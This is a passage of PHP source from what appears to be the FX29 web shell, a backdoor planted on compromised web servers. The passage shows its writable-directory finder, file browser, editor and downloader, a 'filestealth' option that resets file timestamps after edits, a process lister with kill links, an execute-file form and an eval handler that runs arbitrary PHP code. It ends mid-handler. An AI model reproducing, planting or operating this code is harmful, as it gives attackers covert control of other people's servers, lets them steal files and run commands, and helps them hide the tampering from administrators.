1752         $dir_count++;
1753         if( $cdir = dir($dir) ) {
1754           while( $entry = $cdir-> read() ) {
1755             if( $entry != '.' && $entry != '..' ) {
1756               if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
1757                if ($dir_count > $max_dir) { return; }
1758                 echo "[".$dir_count."] ".$dir.$entry."\n";
1759                 recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
1760               }
1761             }
1762           }
1763           $cdir->close();
1764         }
1765       }
1766       if (!$arg1) { $arg1 = $d; }
1767       if (!$arg2) { $arg2 = 10; }
1768       if (is_dir($arg1)) {
1769         echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
1770         echo "<pre>";
1771         recurse_dir($arg1,$arg2);
1772         echo "</pre>";
1773         $total = $dir_count - 1;
1774         echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
1775       }
1776       else {
1777         disp_error("Directory is not exists or permission denied!");
1778       }
1779     }
1780     else {
1781       if (!$arg1) { disp_error("No operation! Please fill 1st parameter!"); }
1782       else {
1783         if ($hasil = $fsfunc($arg1)) {
1784           echo "<b>Result of $fsfunc $arg1:</b><br>";
1785           if (!is_array($hasil)) { echo "$hasil\n"; }
1786           else {
1787             echo "<pre>";
1788             foreach ($hasil as $v) { echo $v."\n"; }
1789             echo "</pre>";
1790           }
1791         }
1792         else { disp_error("$fsfunc $arg1 failed!"); }
1793       }
1794     }
1795     echo "</div>\n";
1796   }
1797   ###[ DIRECTORY LIST ]###
1798   if ($act == "ls") {
1799     if (count($ls_arr) > 0) { $list = $ls_arr; }
1800     else {
1801       $list = array();
1802       if ($h = @opendir($d)) {
1803         while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; }
1804         closedir($h);
1805       }
1806     }
1807     if (count($list) == 0) {
1808       disp_error("No such directory or access denied!<br>".htmlspecialchars($d));
1809     }
1810     else {
1811       $objects = array();
1812       $vd = "f"; #Viewing mode
1813       if ($vd == "f") {
1814         $objects["head"] = array();
1815         $objects["folders"] = array();
1816         $objects["links"] = array();
1817         $objects["files"] = array();
1818         foreach ($list as $v) {
1819           $o = basename($v);
1820           $row = array();
1821           if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; }
1822           elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; }
1823           elseif (is_dir($v)) {
1824             if (is_link($v)) { $type = "LINK"; }
1825             else { $type = "DIR"; }
1826             $row[] = $v;
1827             $row[] = $type;
1828           }
1829           elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); }
1830           $row[] = filemtime($v);
1831           if (!is_windows()) {
1832             $ow = posix_getpwuid(fileowner($v));
1833             $gr = posix_getgrgid(filegroup($v));
1834             $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1835           }
1836           $row[] = fileperms($v);
1837           if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1838           elseif (is_link($v)) { $objects["links"][] = $row; }
1839           elseif (is_dir($v)) { $objects["folders"][] = $row; }
1840           elseif (is_file($v)) { $objects["files"][] = $row; }
1841           $i++;
1842         }
1843         $row = array();
1844         $row[] = "<b>Name</b>";
1845         $row[] = "<b>Size</b>";
1846         $row[] = "<b>Date Modified</b>";
1847         if (!is_windows()) {$row[] = "<b>Owner/Group</b>";}
1848         $row[] = "<b>Perms</b>";
1849         $row[] = "<b>Action</b>";
1850         $parsesort = parsesort($sort);
1851         $sort = $parsesort[0].$parsesort[1];
1852         $k = $parsesort[0];
1853         if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1854         $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1855         $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" alt=\"".($parsesort[1] == "a"?"Asc":"Desc")."\"></a>";
1856         $row[$k] .= $y;
1857         for($i=0;$i<count($row)-1;$i++) {
1858           if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1859         }
1860         $v = $parsesort[0];
1861         usort($objects["folders"], "tabsort");
1862         usort($objects["links"], "tabsort");
1863         usort($objects["files"], "tabsort");
1864         if ($parsesort[1] == "d") {
1865           $objects["folders"] = array_reverse($objects["folders"]);
1866           $objects["files"] = array_reverse($objects["files"]);
1867         }
1868         $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1869         $tab = array();
1870         $tab["cols"] = array($row);
1871         $tab["head"] = array();
1872         $tab["folders"] = array();
1873         $tab["links"] = array();
1874         $tab["files"] = array();
1875         $i = 0;
1876         foreach ($objects as $a) {
1877           $v = $a[0];
1878           $o = basename($v);
1879           $dir = dirname($v);
1880           if ($disp_fullpath) { $disppath = $v; }
1881           else { $disppath = $o; }
1882           $disppath = str2mini($disppath,60);
1883           if (in_array($v,$sess_data["cut"])) { $disppath = "<strike>".$disppath."</strike>"; }
1884           elseif (in_array($v,$sess_data["copy"])) { $disppath = "<u>".$disppath."</u>"; }
1885           foreach ($regxp_highlight as $r) {
1886             if ( ereg($r[0],strtolower($o)) ) {
1887               if ((!is_numeric($r[1])) or ($r[1] > 3)) {
1888                 $r[1] = 0;
1889                 @ob_clean();
1890                 disp_error("Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command.");
1891                 fx29shexit();
1892               }
1893               else {
1894                 $r[1] = round($r[1]);
1895                 $isdir = is_dir($v);
1896                 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
1897                   if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
1898                   $disppath = $r[2].$disppath.$r[3];
1899                   if (isset($r[4])) { break; }
1900                 }
1901               }
1902             }
1903           }
1904           $uo = urlencode($o);
1905           $ud = urlencode($dir);
1906           $uv = urlencode($v);
1907           $row = array();
1908           if ($o == ".") {
1909             $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> ".$o."</a>";
1910             $row[] = "CURDIR";
1911           }
1912           elseif ($o == "..") {
1913             $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> ".$o."</a>";
1914             $row[] = "UPDIR";
1915           }
1916           elseif (is_dir($v)) {
1917             if (is_link($v)) {
1918               $disppath .= " => ".readlink($v);
1919               $type = "LNK";
1920               $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" alt=\"\"> [".$disppath."]</a>";
1921             }
1922             else {
1923               $type = "DIR";
1924               $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" alt=\"\"> [".$disppath."]</a>";
1925             }
1926             $row[] = $type;
1927           }
1928           elseif(is_file($v)) {
1929             $ext = explode(".",$o);
1930             $c = count($ext)-1;
1931             $ext = $ext[$c];
1932             $ext = strtolower($ext);
1933             $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" alt=\"\"> ".$disppath."</a>";
1934             $row[] = view_size($a[1]);
1935           }
1936           $row[] = @date("d.m.Y H:i:s",$a[2]);
1937           if (!is_windows()) { $row[] = $a[3]; }
1938           $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
1939           if ($o == ".") {
1940             $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">";
1941             $i--;
1942           }
1943           else {
1944             $checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";
1945           }
1946           if (is_dir($v)) {
1947             $row[] = "$checkbox <a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ";
1948           }
1949           else {
1950             $row[] = "$checkbox ".
1951                      "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\"></a> ".
1952                      "<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\"></a> ".
1953                      "<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\"></a>";
1954           }
1955           if (($o == ".") or ($o == "..")) { $tab["head"][] = $row; }
1956           elseif (is_link($v)) { $tab["links"][] = $row; }
1957           elseif (is_dir($v)) { $tab["folders"][] = $row; }
1958           elseif (is_file($v)) { $tab["files"][] = $row; }
1959           $i++;
1960         }
1961       }
1962       #Listing Files & Folders
1963       echo "<div class=barheader>.: ";
1964       if (!empty($fx_infohead)) { echo $fx_infohead; }
1965       else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
1966       echo " :.</div>\n\n";
1967       echo "<form name=\"ls_form\" action=\"$surl\" method=POST>\n".
1968            "<input type=hidden name=act value=\"$dspact\">\n".
1969            "<input type=hidden name=d value=\"$d\">\n";
1970 ?>
1971 
1972 
1973 <table class="explorer">
1974 <?php
1975       $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
1976       foreach($table as $row) {
1977         echo "\t<tr>";
1978         foreach($row as $v) { echo "<td>".$v."</td>"; }
1979         echo "</tr>\n";
1980       }
1981 ?>
1982 
1983 
1984 </table>
1985 <div align="right">
1986     <script language="javascript">
1987     function ls_setcheckboxall(status) {
1988       var id = 1; var num = <?php echo(count($table) - 2); ?>;
1989       while (id <= num) {
1990         document.getElementById('actbox'+id).checked = status; id++;
1991       }
1992     }
1993     function ls_reverse_all() {
1994       var id = 1; var num = <?php echo(count($table) - 2); ?>;
1995       while (id <= num) {
1996         document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++;
1997       }
1998     }
1999     </script>
2000     <input type="button" onclick="ls_setcheckboxall(true);" value="Check all">
2001     <input type="button" onclick="ls_setcheckboxall(false);" value="Uncheck all">
2002 <?php
2003       if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0) {
2004         echo "\t<input type=\"submit\" name=\"actarcbuff\" value=\"Archive it!\">".
2005              "\t<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">\n".
2006              "\t<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">\n".
2007              "\t<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">";
2008       }
2009       echo "\n\t".
2010            "<select name=act>\n".
2011              "\t\t<option value=\"".$act."\">With checked:</option>\n";
2012       $f_acts = array("delete","chmod","cut","copy","unselect");
2013       foreach ($f_acts as $f1) {
2014         echo "\t\t<option value=\"$f1\"".($dspact == "$f1"?" selected":"").">$f1</option>\n";
2015       }
2016       ?>
2017 
2018 
2019     </select>
2020     <input type="submit" value="Confirm">
2021 </div>
2022 </form>
2023 <?php
2024     }
2025   }
2026   ###[ FILE ]###
2027   if ($act == "f") {
2028     echo "<div align=left>";
2029     if (!isset($ft)) { $ft = ""; }
2030     if (!isset($newwin)) { $newwin = ""; }
2031     if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2032       if (file_exists($d.$f)) {
2033         disp_error("Access denied!<br>".htmlspecialchars($d.$f));
2034       }
2035       else {
2036         disp_error("File doesn't exists: ".htmlspecialchars($d.$f)."<br>\n".
2037                    "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a>");
2038       }
2039     }
2040     else {
2041       $r   = @file_get_contents($d.$f);
2042       $ext = explode(".",$f);
2043       $c   = count($ext)-1;
2044       $ext = $ext[$c];
2045       $ext = strtolower($ext);
2046       $rft = "";
2047       foreach ($ftypes as $k => $v) {
2048         if (in_array($ext,$v)) { $rft = $k; break; }
2049       }
2050       if (eregi("sess_(.*)",$f)) { $rft = "phpsess"; }
2051       if (empty($ft)) { $ft = $rft; }
2052       $arr = array(
2053           array("<img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\">","info"),
2054           array("<img src=\"".$surl."act=img&img=ext_html\" alt=\"html\">","html"),
2055           array("<img src=\"".$surl."act=img&img=ext_txt\" alt=\"txt\">","txt"),
2056           array("<img src=\"".$surl."act=img&img=ext_ini\" alt=\"ini\">","ini"),
2057           array("Code","code"),
2058           array("Session","phpsess"),
2059           array("SDB","sdb"),
2060           array("<img src=\"".$surl."act=img&img=ext_exe\" alt=\"exe\">","exe"),
2061           array("<img src=\"".$surl."act=img&img=ext_gif\" alt=\"img\">","img"),
2062           array("<img src=\"".$surl."act=img&img=ext_rtf\" alt=\"Notepad\">","notepad"),
2063           array("<img src=\"".$surl."act=img&img=change\" alt=\"Edit\">","edit"),
2064           array("<img src=\"".$surl."act=img&img=download\" alt=\"Download\">","download")
2065       );
2066       echo "<div class=barheader>.: File Viewer [".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f).") :.\n";
2067       echo "<hr size=1 noshade>\n";
2068       foreach($arr as $t) {
2069         if ($t[1] == $rft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=#3366FF>".$t[0]."</font></a>"; }
2070         elseif ($t[1] == $ft) { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>"; }
2071         else { echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>"; }
2072         echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."&newwin=1\" title=\"New Window\" target=\"_blank\">+</a>) ";
2073       }
2074       echo "</div>\n";
2075       if ($ft == "info") {
2076         echo "<br><div class=barheader>Information</div>\n".
2077              "<table class=contents>\n".
2078              "<tr><th>Path</th><td>".$d.$f."</td></tr>\n".
2079              "<tr><th>Size</th><td>".view_size(filesize($d.$f))."</td></tr>\n".
2080              "<tr><th>MD5</th><td>".md5_file($d.$f)."</td></tr>\n";
2081         if (!is_windows()) {
2082           echo "<tr><th><b>Owner/Group</b></td><td>";
2083           $ow = posix_getpwuid(fileowner($d.$f));
2084           $gr = posix_getgrgid(filegroup($d.$f));
2085           echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2086         }
2087         echo "<tr><th>Perms</th><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr>\n".
2088              "<tr><th>Create time</th><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>\n".
2089              "<tr><th>Access time</th><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>\n".
2090              "<tr><th>Modify time</th><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>\n";
2091         echo "<tr><th>HexDump</th><td>\n".
2092              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a> ] ".
2093              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a> ]<br>\n".
2094              "</td></tr>\n".
2095              "<tr><th>Base64</th><td>\n".
2096              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a> ] ".
2097              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a> ] ".
2098              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a> ] ".
2099              "[ <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a> ] ".
2100              "</td></tr>\n".
2101              "</table><br>\n";
2102         $fi = fopen($d.$f,"rb");
2103         if ($fi) {
2104           echo "<div class=barheader>";
2105           if (@$fullhexdump) { echo "Full HexDump"; $str = fread($fi,filesize($d.$f)); }
2106           else { echo "HexDump Preview"; $str = fread($fi,$hexdump_lines*$hexdump_rows); }
2107           $n  = 0;
2108           $a0 = "00000000<br>";
2109           $a1 = "";
2110           $a2 = "";
2111           for ($i=0; $i<strlen($str); $i++) {
2112             $a1 .= sprintf("%02X",ord($str[$i]))." ";
2113             switch (ord($str[$i])) {
2114               case 0 :  $a2 .= "<font>0</font>"; break;
2115               case 32:
2116               case 10:
2117               case 13: $a2 .= " "; break;
2118               default: $a2 .= htmlspecialchars($str[$i]);
2119             }
2120             $n++;
2121             if ($n == $hexdump_rows) {
2122               $n = 0;
2123               if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2124               $a1 .= "<br>";
2125               $a2 .= "<br>";
2126             }
2127           }
2128           echo "</div>\n";
2129           echo "<table class=code><tr><td>".$a0."</td><td>".$a1."</td><td>".$a2."</td></tr></table><br>\n";
2130         }
2131         $henc = "";
2132         $encoded  = "";
2133         if (!isset($base64)) { $base64 = ""; }
2134         if ($base64 == 1) {
2135           $henc = "Base64 Encode";
2136           $encoded = base64_encode(file_get_contents($d.$f));
2137         }
2138         elseif($base64 == 2) {
2139           $henc = "Base64 Encode + Chunk";
2140           $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2141         }
2142         elseif($base64 == 3) {
2143           $henc = "Base64 Encode + Chunk + Quotes";
2144           $encoded = base64_encode(file_get_contents($d.$f));
2145           $encoded = substr(preg_replace("!.{1,76}!","'\&#92;&#48;'.\n",$encoded),0,-2);
2146         }
2147         elseif($base64 == 4) {
2148           $text = file_get_contents($d.$f);
2149           $encoded = base64_decode($text);
2150           $henc = "<b>Base64 Decode";
2151           if (base64_encode($encoded) != $text) { $henc .= " (Failed!)"; }
2152         }
2153         if (!empty($encoded)) {
2154           echo "<div class=barheader>$henc</div>\n";
2155           echo "<textarea cols=100 rows=10>".htmlspecialchars($encoded)."</textarea>";
2156           echo "<br>\n";
2157         }
2158       }
2159       elseif ($ft == "html") {
2160         if ($newwin) { @ob_clean(); echo $r; fx29shexit(); }
2161         else { echo $r; }
2162       }
2163       elseif ($ft == "txt") {
2164         echo "<center><textarea cols=\"125\" rows=\"20\">".htmlspecialchars($r)."</textarea></center>";
2165       }
2166       elseif ($ft == "ini") {
2167         echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";
2168       }
2169       elseif ($ft == "phpsess") {
2170         echo "<pre>";
2171         $v = explode("|",$r);
2172         echo $v[0]."<br>";
2173         var_dump(unserialize($v[1]));
2174         echo "</pre>";
2175       }
2176       elseif ($ft == "exe") {
2177         $ext = explode(".",$f);
2178         $c = count($ext)-1;
2179         $ext = $ext[$c];
2180         $ext = strtolower($ext);
2181         $rft = "";
2182         foreach ($exeftypes as $k => $v) {
2183          if (in_array($ext,$v)) { $rft = $k; break; }
2184         }
2185         $cmd = str_replace("%f%",$f,$rft);
2186         echo "<b>Execute file:</b>\n".
2187              "<form name=\"f_xfile\" action=\"".$surl."\" method=POST>\n".
2188              "<input type=hidden name=act value=cmd>\n".
2189              "<input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br>\n".
2190              "<input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"> \n".
2191              "<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked> - Display in text-area\n".
2192              "<input type=submit name=submit value=\"Execute\"></form>\n";
2193       }
2194       elseif ($ft == "sdb") { echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>\n"; }
2195       elseif ($ft == "code") {
2196         echo "<div class=code style=\"background-color: ".$highlight_bg."\">\n";
2197         if (@$newwin) { @ob_clean(); highlight_file($d.$f); fx29shexit(); }
2198         else { highlight_file($d.$f); }
2199         echo "\n</div>\n";
2200       }
2201       elseif ($ft == "notepad") {
2202         @ob_clean();
2203         header("Content-type: text/plain");
2204         header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2205         echo($r);
2206         exit;
2207       }
2208       elseif ($ft == "download") {
2209         @ob_clean();
2210         header("Content-type: application/octet-stream");
2211         header("Content-length: ".filesize($d.$f));
2212         header("Content-disposition: attachment; filename=\"".$f."\";");
2213         echo $r;
2214         exit;
2215       }
2216       elseif ($ft == "img") {
2217         $inf = getimagesize($d.$f);
2218         if (!$newwin) {
2219           if (empty($imgsize)) {$imgsize = 20;}
2220           $width = $inf[0]/100*$imgsize;
2221           $height = $inf[1]/100*$imgsize;
2222           echo "<center><b>Size:</b> ";
2223           $sizes = array("100","50","20");
2224           foreach ($sizes as $v) {
2225             echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2226             if ($imgsize != $v ) {echo $v;}
2227             else {echo "<u>".$v."</u>";}
2228             echo "</a> &nbsp; ";
2229           }
2230           echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&newwin=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\"></center>";
2231         }
2232         else {
2233           @ob_clean();
2234           $ext = explode($f,".");
2235           $ext = $ext[count($ext)-1];
2236           header("Content-type: ".$inf["mime"]);
2237           readfile($d.$f);
2238           exit;
2239         }
2240       }
2241       elseif ($ft == "edit") {
2242        if (!empty($submit)) {
2243          if ($filestealth) {$stat = stat($d.$f);}
2244          $fp = fopen($d.$f,"w");
2245          if (!$fp) {echo "<b>Can't write to file!</b>";}
2246          else {
2247            echo "<b>Saved!</b>";
2248            fwrite($fp,$edit_text);
2249            fclose($fp);
2250            if ($filestealth) { touch($d.$f,$stat[9],$stat[8]); }
2251            $r = $edit_text;
2252          }
2253        }
2254        $rows = count(explode("\r\n",$r));
2255        if ($rows < 10) { $rows = 10; }
2256        elseif ($rows > 30) { $rows = 30; }
2257        echo "<form name=\"f_save\" action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST>\n".
2258             "<input type=submit name=submit value=\"Save\"> ".
2259             "<input type=\"reset\" value=\"Reset\"> ".
2260             "<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br>".
2261             "<textarea name=\"edit_text\" cols=\"125\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea>\n".
2262             "</form>\n";
2263       }
2264       elseif (!empty($ft)) {
2265         echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";
2266       }
2267       else {
2268         echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";
2269       }
2270     }
2271     echo "</div>\n";
2272   }
2273   ###[ DIRECTORY ]###
2274   if ($act == "d") {
2275     if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
2276     else {
2277       echo "<b>Directory information:</b>\n";
2278       echo "<table>\n";
2279       if (!is_windows()) {
2280         echo "<tr><td><b>Owner/Group</b></td><td> ";
2281         $ow = posix_getpwuid(fileowner($d));
2282         $gr = posix_getgrgid(filegroup($d));
2283         $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
2284       }
2285       echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
2286     }
2287   }
2288   ###[ PROCESSES ]###
2289   if ($act == "processes") {
2290 ?>
2291 
2292 
2293 <div class="barheader">.: Processes :.</div>
2294 <?php
2295     if (!is_windows()) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
2296     else { $handler = "tasklist"; }
2297     $ret = fx29exec($handler);
2298     if (!$ret) { disp_error("Can't execute \"$handler\"!"); }
2299     else {
2300       if (empty($processes_sort)) { $processes_sort = $sort_default; }
2301       $parsesort = parsesort($processes_sort);
2302       if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
2303       $k = $parsesort[0];
2304       if ($parsesort[1] != "a") {
2305         $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2306       }
2307       else {
2308         $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2309       }
2310       $ret = htmlspecialchars($ret);
2311       if (!is_windows()) {
2312         if ($pid) {
2313           if (is_null($sig)) { $sig = 9; }
2314           echo "Sending signal ".$sig." to #".$pid."... ";
2315           if (posix_kill($pid,$sig)) { echo "<b>OK!</b>"; } else { echo "<b>ERROR!</b>"; }
2316         }
2317         while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
2318         $stack = explode("\n",$ret);
2319         $head = explode(" ",$stack[0]);
2320         unset($stack[0]);
2321         for($i=0;$i<count($head);$i++) {
2322           if ($i != $k) {
2323             $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
2324           }
2325         }
2326         $head[$i] = "";
2327         $prcs = array();
2328         foreach ($stack as $line) {
2329           if (!empty($line)) {
2330             $line = explode(" ",$line);
2331             $line[10] = join(" ",array_slice($line,10));
2332             $line = array_slice($line,0,11);
2333             if ($line[0] == get_current_user()) { $line[0] = '<font class="on">'.$line[0]."</font>"; }
2334             $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2335             $prcs[] = $line;
2336           }
2337         }
2338       }
2339       #For Windows - Fixed By FaTaLisTiCz_Fx
2340       else {
2341         if (@$pid) {
2342           echo "Killing PID ".$pid."... ";
2343           echo fx29exec("taskkill /PID $pid /F");
2344         }
2345         while (ereg("  ",$ret)) { $ret = str_replace("  "," ",$ret); }
2346         while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2347         $ret = convert_cyr_string($ret,"d","w");
2348         $stack = explode("\n",$ret);
2349         unset($stack[0],$stack[2]);
2350         $stack = array_values($stack);
2351         $stack[0] = str_replace("Image Name","Image-Name",$stack[0]);
2352         $stack[0] = str_replace("Session Name","Session-Name",$stack[0]);
2353         $stack[0] = str_replace("Mem Usage","Memory-Usage",$stack[0]);
2354         $stack[0] .= " KILL";
2355         $head = explode(" ",$stack[0]);
2356         $stack = array_slice($stack,1);
2357         $head = array_values($head);
2358         if ($parsesort[1] != "a") {
2359           $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" alt=\"Desc\"></a>";
2360         }
2361         else {
2362           $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" alt=\"Asc\"></a>";
2363         }
2364         if ($k > count($head)) {$k = count($head)-1;}
2365         for($i=0;$i<count($head);$i++) {
2366           if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2367         }
2368         $prcs = array();
2369         unset($stack[0]);
2370         foreach ($stack as $line) {
2371           if (!empty($line)) {
2372             $line = explode(" ",$line);
2373             $line[4] = str_replace(".","",$line[4]);
2374             $line[4] = intval($line[4]) * 1024;
2375             unset($line[5]);
2376             $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."\"><u>KILL</u></a>";
2377             $prcs[] = $line;
2378           }
2379         }
2380       }
2381       $head[$k] = "<b>".$head[$k]."</b>".$y;
2382       $v = $processes_sort[0];
2383       usort($prcs,"tabsort");
2384       if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2385       $tab = array();
2386       $tab[] = $head;
2387       $tab = array_merge($tab,$prcs);
2388       echo "<table class=\"explorer\">\n";
2389       foreach($tab as $i=>$k) {
2390         echo "\t<tr>";
2391         foreach($k as $j=>$v) {
2392           if (is_windows() and $i > 0 and $j == 4) { $v = view_size($v); }
2393           echo "<td>".$v."</td>";
2394         }
2395         echo "</tr>\n";
2396       }
2397       echo "</table>\n";
2398     }
2399   }
2400   ###[ EVAL ]###
2401   if ($act == "eval") {
2402     if (!empty($eval)) {
2403       echo "<div class=barheader>Result of execution this PHP-code:</div>\n";
2404       $tmp = @ob_get_contents();
2405       $olddir = realpath(".");
2406       @chdir($d);
2407       if ($tmp) {
2408         @ob_clean();
2409         eval($eval);
2410         $ret = @ob_get_contents();
2411         $ret = convert_cyr_string($ret,"d","w");
2412         @ob_clean();
2413         echo $tmp;
2414         if (@$eval_txt) {
2415           $rows = count(explode("\r\n",$ret))+1;
2416           if ($rows < 10) {$rows = 10;}
